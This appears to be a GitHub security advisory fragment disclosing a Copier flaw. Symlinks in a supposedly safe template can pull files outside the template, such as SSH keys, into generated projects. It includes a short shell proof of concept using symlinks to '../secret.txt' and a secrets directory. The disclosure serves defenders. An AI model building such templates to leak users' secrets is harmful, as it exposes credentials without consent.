+ "details": "### Impact\n\nCopier suggests that it's safe to generate a project from a safe template, i.e. one that doesn't use [unsafe](https://copier.readthedocs.io/en/stable/configuring/#unsafe) features like custom Jinja extensions which would require passing the `--UNSAFE,--trust` flag. As it turns out, a safe template can currently include arbitrary files/directories outside the local template clone location by using symlinks along with [`_preserve_symlinks: false`](https://copier.readthedocs.io/en/stable/configuring/#preserve_symlinks) (which is Copier's default setting). \n\nImagine, e.g., a malicious template author who creates a template that reads SSH keys or other secrets from well-known locations and hopes for a user to push the generated project to a public location like [github.com](https://github.com/) where the template author can extract the secrets.\n\nReproducible example:\n\n- Illegally include a file in the generated project via symlink resolution:\n\n ```shell\n echo \"s3cr3t\" > secret.txt\n\n mkdir src/\n pushd src/\n ln -s ../secret.txt stolen-secret.txt\n popd\n\n uvx copier copy src/ dst/\n\n cat dst/stolen-secret.txt\n #s3cr3t\n ```\n\n- Illegally include a directory in the generated project via symlink resolution:\n\n ```shell\n mkdir secrets/\n pushd secrets/\n echo \"s3cr3t\" > secret.txt\n popd\n\n mkdir src/\n pushd src/\n ln -s ../secrets stolen-secrets\n popd\n\n uvx copier copy src/ dst/\n\n tree dst/\n # dst/\n # └── stolen-secrets\n # └── secret.txt\n #\n # 1 directory, 1 file\n cat dst/stolen-secrets/secret.txt\n # s3cr3t\n ```\n\n### Patches\n\nn/a\n\n### Workarounds\n\nn/a\n\n### References\n\nn/a",
![advisory-database[bot]](https://avatars.githubusercontent.com/in/21409?v=4&size=40){kind=avatar}
0 commit comments